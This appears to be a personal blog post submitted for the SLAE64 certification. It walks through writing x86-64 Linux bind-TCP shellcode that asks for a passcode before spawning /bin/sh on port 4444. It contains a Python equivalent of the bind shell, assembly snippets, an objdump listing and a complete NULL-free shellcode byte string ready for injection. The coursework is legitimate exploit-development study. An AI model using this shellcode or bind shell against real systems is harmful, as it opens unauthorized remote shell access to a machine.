SLAE64 - Bind TCP shellcode
The first assignment of the SLAE64 exam states:
- Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a “passcode”
- If passcode is correct then execute a shell
- Remove 0x00 from the Bind TCP shellcode discussed in the course
Shell Bind TCP shellcode
The first assignment is to create a shell bind TCP shellcode which requires a passcode to spawn a shell. What happens when a wrong password is entered isn’t defined so I’ll just exit with a non-zero return code.
It follows this basic pattern to spawn a shell:
- Allocate a file descriptor through socket(2)
- Set up the structure defining the address family, address and port to listen to
- Bind the socket with the above parameters
- Listen on the socket for incoming connections
- Upon accepting a connection, perform the needed steps to duplicate the file descriptors for input/output
- Print a password prompt and require the correct password to be entered
- If the password was correct a shell is spawned; otherwise it exits
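The steps above can be sketched in a higher-level language to make the order of the calls easier to follow. This is only a rough Python equivalent, not the shellcode itself: the names `serve_once` and `passcode_ok` and the passcode value are hypothetical, and error handling is left out just as in the shellcode.

```python
import os
import socket

PORT = 4444                # port used by the shellcode in this post
PASSCODE = b"s3cr3t!\n"    # hypothetical 8-byte passcode, not the author's


def passcode_ok(received: bytes, expected: bytes = PASSCODE) -> bool:
    """Return True only when the received bytes match the passcode exactly."""
    return received == expected


def serve_once(port: int = PORT) -> None:
    """Accept one client, ask for the passcode, then exec a shell or exit."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # socket(2)
    srv.bind(("0.0.0.0", port))                              # bind(2), INADDR_ANY
    srv.listen(2)                                            # listen(2)
    conn, _peer = srv.accept()                               # accept(2)
    srv.close()                                              # listener no longer needed

    # Point stdin, stdout and stderr at the client connection.
    for fd in (0, 1, 2):
        os.dup2(conn.fileno(), fd)                           # dup2(2)

    os.write(1, b"enter password: ")
    if not passcode_ok(os.read(0, len(PASSCODE))):
        os._exit(1)                                          # wrong passcode: non-zero exit
    os.execve("/bin/sh", ["/bin/sh"], {})                    # execve(2)
```

Nothing runs on import; calling `serve_once()` blocks until a client connects, for example with `nc 127.0.0.1 4444`.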
If this were regular assembly rather than shellcode, where size is a constraint, it would be a good habit to check the return value of every syscall. Most of them return a negative value upon failure, so we can test for a value less than 0 (held in R13 in the example below) and jump to the out label, which calls exit with a non-zero return code to indicate a failure. For example:
[...]
syscall
xor r13, r13
cmp rax, r13
jl out
out:
mov rax, 60
mov rdi, 1
syscall
However, this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise I ignore errors and simply hope none of the syscalls fail.
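To make the "negative value upon failure" convention concrete, here is a small Python sketch that interprets a raw RAX value the way the `jl` check does. It assumes the usual Linux convention that a failing raw syscall returns the negated errno; the helper names are made up for this illustration.

```python
import errno

MASK64 = (1 << 64) - 1


def as_signed64(raw: int) -> int:
    """Interpret a raw 64-bit register value as a signed integer."""
    raw &= MASK64
    return raw - (1 << 64) if raw >> 63 else raw


def describe_syscall_result(rax: int) -> str:
    """Mimic the signed `less than 0` check and name the error, if any."""
    value = as_signed64(rax)
    if value < 0:
        return "failed: " + errno.errorcode.get(-value, "unknown errno")
    return "ok: " + str(value)


# A bind(2) that fails because the port is taken leaves -EADDRINUSE in RAX.
failed_rax = (-errno.EADDRINUSE) & MASK64
print(describe_syscall_result(failed_rax))   # failed: EADDRINUSE
print(describe_syscall_result(3))            # ok: 3
```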
The passcode handling relies on a simple cmp instruction and whether it sets the zero flag or not. This works because cmp subtracts its operands and, if they are equal, the result is zero, so ZF gets set. A set ZF therefore means the data we read is equal to the string we stored previously in RBX.
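The comparison can be modelled in a few lines of Python. This is only a sketch of the idea: the passcode below is a hypothetical 8-byte value, and `as_qword` and `cmp_sets_zf` are names invented here, not part of the shellcode.

```python
MASK64 = (1 << 64) - 1


def as_qword(data: bytes) -> int:
    """Load exactly 8 bytes the way a 64-bit load from memory would (little-endian)."""
    if len(data) != 8:
        raise ValueError("expected exactly 8 bytes")
    return int.from_bytes(data, "little")


def cmp_sets_zf(a: int, b: int) -> bool:
    """Model `cmp a, b`: compute a - b modulo 2**64 and report whether ZF is set."""
    return ((a - b) & MASK64) == 0


EXPECTED = as_qword(b"s3cr3t!\n")   # hypothetical passcode held in RBX

print(cmp_sets_zf(as_qword(b"s3cr3t!\n"), EXPECTED))   # True: ZF set, spawn the shell
print(cmp_sets_zf(as_qword(b"S3cr3t!\n"), EXPECTED))   # False: ZF clear, exit
```

Because a single register holds 8 bytes, one cmp can only check a passcode of up to 8 bytes this way.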
For me the difficulty in this assignment was to correctly lay out the required structs on the stack without introducing any NULL bytes. The prime example of this is setting up struct sockaddr (a struct sockaddr_in for AF_INET) for the bind(2) syscall.
First off, we need to construct the struct (pun intended) in reverse order as we’re dealing with the stack. So start by pushing 8 bytes of 0 for sin_zero:
xor rax, rax
push rax
Now here comes the key: push another 8 bytes of zero. This ensures the stack space we need is already zeroed out, so the stores that follow only have to write the non-zero bytes:
push rax ; Another 8 bytes worth of zero.
; Half of it is for sin_addr.s_addr.
mov word [rsp+2], 0x5c11 ; Store sin_port: 4444 (0x115c) in network byte order
mov byte [rsp], 0x2 ; AF_INET = 2
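As a sanity check on this layout, the stack writes can be replayed in Python and compared against a struct sockaddr_in built with the struct module. This is a sketch assuming the usual 16-byte Linux x86-64 layout (sin_family, sin_port, sin_addr, sin_zero); the variable names are only for illustration.

```python
import socket
import struct

PORT = 4444

# Reference layout of struct sockaddr_in (16 bytes):
#   sin_family (2, host order) | sin_port (2, network order) |
#   sin_addr (4) | sin_zero (8)
reference = (
    struct.pack("<H", socket.AF_INET)   # 02 00
    + struct.pack(">H", PORT)           # 11 5c
    + bytes(4)                          # INADDR_ANY (0.0.0.0)
    + bytes(8)                          # sin_zero
)

# Replay the stack writes: two zeroed qwords, then the two small stores.
stack = bytearray(16)                       # push rax; push rax
stack[2:4] = struct.pack("<H", 0x5C11)      # mov word [rsp+2], 0x5c11
stack[0] = 0x02                             # mov byte [rsp], 0x2

print(stack.hex())               # 0200115c000000000000000000000000
print(bytes(stack) == reference)  # True
```

The word 0x5c11 looks byte-swapped because x86-64 stores it little-endian, which leaves 11 5c in memory: exactly 4444 in network byte order.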
In the end I decided to add an enter password: prompt as well. Since that string exceeds 8 bytes it had to be pushed onto the stack using two mov/push operations.
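Working out the constants for such mov/push pairs by hand is error-prone, so a small helper can do it. The sketch below assumes a 16-byte prompt with a trailing space and RBX as the scratch register; the exact bytes and register used in the actual shellcode may differ, and `push_qwords` is a hypothetical name.

```python
def push_qwords(text: bytes) -> list:
    """Split text into 8-byte chunks and return them as little-endian
    integers in the order they have to be pushed (last chunk first)."""
    if len(text) % 8 != 0:
        raise ValueError("length must be a multiple of 8 to avoid NULL padding")
    chunks = [text[i:i + 8] for i in range(0, len(text), 8)]
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


# Assumed 16-byte prompt (with a trailing space); the post's exact bytes may differ.
for value in push_qwords(b"enter password: "):
    print(f"mov rbx, {value:#018x}")
    print("push rbx")
```

The same helper reproduces the constant used for the shell path later in the post: `push_qwords(b"/bin//sh")` gives 0x68732f2f6e69622f.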
The total size of this shellcode is 251 bytes.
Removing 0x00 from the discussed shellcode
The original shellcode contains a fair number of NULLs according to objdump:
$ objdump -D -M intel BindShell.o
BindShell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: b8 29 00 00 00 mov eax,0x29
5: bf 02 00 00 00 mov edi,0x2
a: be 01 00 00 00 mov esi,0x1
f: ba 00 00 00 00 mov edx,0x0
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: 66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
2f: 48 83 ec 08 sub rsp,0x8
33: b8 31 00 00 00 mov eax,0x31
38: 48 89 e6 mov rsi,rsp
3b: ba 10 00 00 00 mov edx,0x10
40: 0f 05 syscall
42: b8 32 00 00 00 mov eax,0x32
47: be 02 00 00 00 mov esi,0x2
4c: 0f 05 syscall
4e: b8 2b 00 00 00 mov eax,0x2b
53: 48 83 ec 10 sub rsp,0x10
57: 48 89 e6 mov rsi,rsp
5a: c6 44 24 ff 10 mov BYTE PTR [rsp-0x1],0x10
5f: 48 83 ec 01 sub rsp,0x1
63: 48 89 e2 mov rdx,rsp
66: 0f 05 syscall
68: 49 89 c1 mov r9,rax
6b: b8 03 00 00 00 mov eax,0x3
70: 0f 05 syscall
72: 4c 89 cf mov rdi,r9
75: b8 21 00 00 00 mov eax,0x21
7a: be 00 00 00 00 mov esi,0x0
7f: 0f 05 syscall
81: b8 21 00 00 00 mov eax,0x21
86: be 01 00 00 00 mov esi,0x1
8b: 0f 05 syscall
8d: b8 21 00 00 00 mov eax,0x21
92: be 02 00 00 00 mov esi,0x2
97: 0f 05 syscall
99: 48 31 c0 xor rax,rax
9c: 50 push rax
9d: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
a4: 2f 73 68
a7: 53 push rbx
a8: 48 89 e7 mov rdi,rsp
ab: 50 push rax
ac: 48 89 e2 mov rdx,rsp
af: 57 push rdi
b0: 48 89 e6 mov rsi,rsp
b3: 48 83 c0 3b add rax,0x3b
b7: 0f 05 syscall
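When reading the listing it helps to map the values loaded into eax/rax to syscall names. The table below is a small Python lookup for the x86-64 Linux syscall numbers that occur in this disassembly; it is a reading aid, not part of the shellcode.

```python
# x86-64 Linux syscall numbers that appear in the listing.
SYSCALLS = {
    0x29: "socket",
    0x31: "bind",
    0x32: "listen",
    0x2B: "accept",
    0x03: "close",
    0x21: "dup2",
    0x3B: "execve",
}

# Values loaded into eax/rax before each `syscall`, in listing order.
seen_in_listing = [0x29, 0x31, 0x32, 0x2B, 0x03, 0x21, 0x21, 0x21, 0x3B]

for number in seen_in_listing:
    print(f"{number:#04x} ({number:3d}) -> {SYSCALLS[number]}")
```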
There are a few common patterns we can use to get rid of the NULLs. For example:
mov eax, 41
can also be expressed as:
xor rax, rax ; clear the rax register (effectively zeroing it)
add rax, 41 ; add 41 to 0
Instead of using the add instruction after clearing the register we could increment the register value if we need something small like 1 or 2.
Another method is to subtract the register from itself:
sub rax, rax
add rax, 41
If we also optimize for size we could take it one step further by using al, which is the lowest 8 bits of the 64-bit rax register:
04 29 add al,0x29
compared to:
48 83 c0 29 add rax,0x29
Additionally, pushing a value onto the stack and then popping it into the destination register is another way to get rid of NULLs, and it often decreases code size too.
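The trade-offs between these patterns are easy to compare by looking at the encodings side by side. In the Python sketch below the first three encodings are taken from the listings in this post; the push/pop pair uses the standard `6a ib` (push imm8) and `58` (pop rax) encodings.

```python
# Byte encodings of four ways to get 41 (0x29) into rax.
ENCODINGS = {
    "mov eax, 41":               bytes.fromhex("b829000000"),
    "xor rax, rax; add rax, 41": bytes.fromhex("4831c0" "4883c029"),
    "xor rax, rax; add al, 41":  bytes.fromhex("4831c0" "0429"),
    "push 41; pop rax":          bytes.fromhex("6a29" "58"),
}

for asm, code in ENCODINGS.items():
    print(f"{asm:28} {len(code)} bytes, {code.count(0)} NULLs")
```

Only the plain mov contains NULL bytes; of the NULL-free variants the push/pop pair is the shortest at 3 bytes.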
The end result for my clean BindShell_no_null.nasm is:
\x48\x31\xc0\x40\xb7\x02\x40\x88\xc6\x40\xfe\xc6\x88\xc2\x48\x83\xc0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x40\x88\xc6\xb0\x32\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x29\xc0\xfe\xc0\xfe\xc0\xfe\xc0\x0f\x05\x4c\x89\xcf\x48\x31\xc9\x88\xc8\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05
It is slightly larger than the original, because I used a variety of ways to zero out and increment registers rather than always picking the method that generates the least code.
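A quick way to confirm that a shellcode string like the one above is NULL-free is to parse it and look for 0x00 bytes. The following Python sketch shows one way to do that; `parse_shellcode` and `null_offsets` are hypothetical helpers and not taken from the author's compile.py.

```python
def parse_shellcode(text: str) -> bytes:
    """Turn a '\\x48\\x31\\xc0' style string into raw bytes."""
    return bytes.fromhex(text.replace("\\x", ""))


def null_offsets(code: bytes) -> list:
    """Return the offset of every 0x00 byte in the shellcode."""
    return [offset for offset, byte in enumerate(code) if byte == 0]


# First instruction of the original listing versus the start of the cleaned version.
original_start = parse_shellcode(r"\xb8\x29\x00\x00\x00")
cleaned_start = parse_shellcode(r"\x48\x31\xc0\x40\xb7\x02\x40\x88\xc6")

print(null_offsets(original_start))   # [2, 3, 4]
print(null_offsets(cleaned_start))    # []
```

Passing the full string to `parse_shellcode` also gives its length via `len()`, which makes it easy to compare sizes between versions.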
Wrapping up
I have uploaded my code to jasperla/slae64 on GitHub.
The repository also contains compile.py (requires Python 3.6), a helper script I wrote to test and validate the code throughout the course.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614